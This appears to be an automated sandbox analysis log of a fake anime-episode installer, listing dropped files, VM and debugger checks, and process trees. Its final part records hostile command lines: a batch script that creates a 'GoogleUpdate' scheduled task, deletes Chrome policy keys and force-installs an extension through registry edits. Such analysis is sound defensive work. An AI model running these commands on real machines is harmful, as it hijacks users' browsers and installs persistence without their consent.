Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\System32\msvcp140_codecvt_ids.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd723.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd707.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd710.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd71c.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd720.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\System32\msvcp140_atomic_wait.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd71d.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd70d.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd721.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd709.rbf (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 3cd719.rbf (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0004FDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0004FE5Dh4_2_0004FDC2
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0004FDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0004FE56h4_2_0004FDC2
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000EFDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 000EFE5Dh5_2_000EFDC2
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000EFDC2 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 000EFE56h5_2_000EFDC2
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeRegistry key enumerated: More than 302 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeRegistry key enumerated: More than 452 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0005962D VirtualQuery,GetSystemInfo,4_2_0005962D
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00013BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,4_2_00013BC3
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00054315 FindFirstFileW,FindClose,4_2_00054315
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0002993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,4_2_0002993E
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00047A87 FindFirstFileExW,4_2_00047A87
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000F4315 FindFirstFileW,FindClose,5_2_000F4315
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000C993E FindFirstFileW,lstrlenW,FindNextFileW,FindClose,5_2_000C993E
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000B3BC3 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,5_2_000B3BC3
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E7A87 FindFirstFileExW,5_2_000E7A87
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cabJump to behavior
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\NULLJump to behavior
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\NULLJump to behavior
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64Jump to behavior
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packagesJump to behavior
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeFile opened: C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\NULLJump to behavior
Source: VC_redist.x64.exe, 0000001C.00000003.364382485.0000000001568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: VC_redist.x64.exe, 0000001C.00000003.364382485.0000000001568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000003.404958372.0000000000ADC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: Boku no Hero Academia 6th Season - Episode 13.tmp, 00000003.00000002.409480442.0000000000AEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003E625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0003E625
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_000138D4 GetProcessHeap,RtlAllocateHeap,4_2_000138D4
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00044812 mov eax, dword ptr fs:[00000030h]4_2_00044812
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E4812 mov eax, dword ptr fs:[00000030h]5_2_000E4812
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003E773 SetUnhandledExceptionFilter,4_2_0003E773
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003E188 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0003E188
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_0003E625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0003E625
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_00043BB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00043BB0
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000DE773 SetUnhandledExceptionFilter,5_2_000DE773
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000DE188 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000DE188
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000DE625 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000DE625
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeCode function: 5_2_000E3BB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000E3BB0
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "c:\programdata\package cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\vc_redist.x64.exe" -burn.clean.room="c:\programdata\package cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\vc_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=564 /quiet /burn.log.append "c:\users\user\appdata\local\temp\dd_vcredist_amd64_20230102153454.log" /install
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded burnpipe.{652d427c-3fcf-4f57-9b0a-0ffbca2578fc} {cf7111b3-ff83-47bf-a56d-0e99b89a84c1} 5468
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -burn.clean.room="c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded burnpipe.{652d427c-3fcf-4f57-9b0a-0ffbca2578fc} {cf7111b3-ff83-47bf-a56d-0e99b89a84c1} 5468
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded burnpipe.{8ade75be-8c64-4d11-b05a-a6c78aecd63f} {6ee058d7-d097-43e8-87f0-a357d97d5238} 1324
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -burn.clean.room="c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded burnpipe.{8ade75be-8c64-4d11-b05a-a6c78aecd63f} {6ee058d7-d097-43e8-87f0-a357d97d5238} 1324
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded burnpipe.{652d427c-3fcf-4f57-9b0a-0ffbca2578fc} {cf7111b3-ff83-47bf-a56d-0e99b89a84c1} 5468Jump to behavior
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "c:\programdata\package cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\vc_redist.x64.exe" -burn.clean.room="c:\programdata\package cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\vc_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=564 /quiet /burn.log.append "c:\users\user\appdata\local\temp\dd_vcredist_amd64_20230102153454.log" /install
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -burn.clean.room="c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded burnpipe.{652d427c-3fcf-4f57-9b0a-0ffbca2578fc} {cf7111b3-ff83-47bf-a56d-0e99b89a84c1} 5468
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded burnpipe.{8ade75be-8c64-4d11-b05a-a6c78aecd63f} {6ee058d7-d097-43e8-87f0-a357d97d5238} 1324
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -burn.clean.room="c:\programdata\package cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\vc_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded burnpipe.{8ade75be-8c64-4d11-b05a-a6c78aecd63f} {6ee058d7-d097-43e8-87f0-a357d97d5238} 1324
Source: C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe "C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe" /SILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmpProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeProcess created: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe "C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=628 /install /quietJump to behavior
Source: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exeProcess created: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe "C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{E9871BE9-995B-4EFF-BA27-126D1FC36700} {ED4F63C9-39F6-4A7D-A76D-4B8F059F42ED} 5372Jump to behavior
Source: C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468Jump to behavior
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe" -burn.filehandle.attached=588 -burn.filehandle.self=564 /quiet /burn.log.append "C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log" /install
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{DC57C196-DCD2-4148-818F-F83AAF0E5C46} {63FE371D-956D-4D2B-988F-00929D1EE668} 2140
Source: C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeProcess created: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe "C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
Source: C:\Users\user\AppData\Local\WindowsApp\InstallExtension.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\WindowsApp\chrome.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Local\WindowsApp\reg.xml" /tn GoogleUpdate
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Policies\Google\Chrome /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKLM\SOFTWARE\WOW6432Node\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d dbffglanhdhedkjkijpkplhpcdndpchj /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "path" /t REG_SZ /d "C:\Users\user\AppData\Local\WindowsApp\apps-helper\apps.crx" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Google\Chrome\Extensions\dbffglanhdhedkjkijpkplhpcdndpchj" /v "version" /t REG_SZ /d 1.0 /f
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exeCode function: 4_2_000515CB InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,4_2_000515CB
